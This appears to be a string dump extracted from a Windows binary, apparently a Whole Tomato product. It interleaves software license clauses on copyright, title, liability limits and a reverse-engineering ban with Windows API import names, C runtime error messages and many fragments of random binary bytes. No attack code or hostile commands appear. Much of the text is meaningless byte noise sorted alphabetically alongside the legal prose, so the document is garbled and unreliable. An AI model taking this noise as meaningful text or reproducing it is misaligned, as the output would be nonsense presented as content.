This Software is protected by both the United States copyright laws and international copyright treaty provisions. You must treat the Software like any other copyrighted material -- for example, a book, except that you may copy it onto a computer to be used and you may make archival copies of the Software for the sole purpose of backing-up our Software and protecting your investment from loss. 
Thursday
t$h$xB
)tirtQ
TITLE. As between the parties, title, ownership rights, and intellectual property rights in and to the Software, and any copies or portions thereof, shall remain in Whole Tomato and its suppliers or licensors. The Software is protected by the copyright laws of the United States and international copyright treaties. Title, ownership rights, and intellectual property rights in and to any software, data, information, text, pictures, images, or other content ("Content") accessed through the Software or otherwise is the property of the applicable owner and may be protected by applicable copyright or other law. This License gives you no rights, title, or interest to Content (including without limitation Content that you create using the Software). 
[`T"JM
$t	jpY
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<tortb
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
t,USSVh
;t$,v-
t`Vunx
t+WWVPV
^	^U}`
]u{(0^
uA:r!r
|u[ek[
u&hpwB
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
unollK
U<oNBr
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by the Government is subject to restrictions set forth in subparagraphs (a) through (d) of the Commercial Computer-Restricted Rights clause at FAR 52.227-19 when applicable, or in subparagraph (c) (1) (ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013, and in similar clauses in the NASA FAR Supplement. 
UTog#w
/Utxts
(v2}BL
VG/3&t
vgmw}9
|V HQ.f
VirtualAlloc
VirtualFree
v	N+D$
VqkSj"
vsrttW
VUBuhJ
Vuj8%A
VVymutr
vZnzBd
@`W=@8@
Wednesday
wFKlACTQke
WideCharToMultiByte
WriteFile
WrtB}4
~Wtnn>
WwQ\l{Q
wwwwwwwwwww
*/X~1 
X6{,{'
)^xN}=
XR2mx 
y4>|M>
yg'wy(
YHFPDq
yNpJnhnriTG0eMnS
You may not, directly or indirectly: modify, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction), create derivative works based on, or otherwise attempt to discover the source code or underlying ideas or algorithms of the Software; or copy (except for archival purposes as set forth above), rent, lease, distribute, transfer or otherwise transfer rights to the Software; use the Software for timesharing or service bureau purposes; or remove any proprietary notices or labels on the Software. 
>=Yt1j
z7840}
Z$,B((
Zoeoej
z?@\ro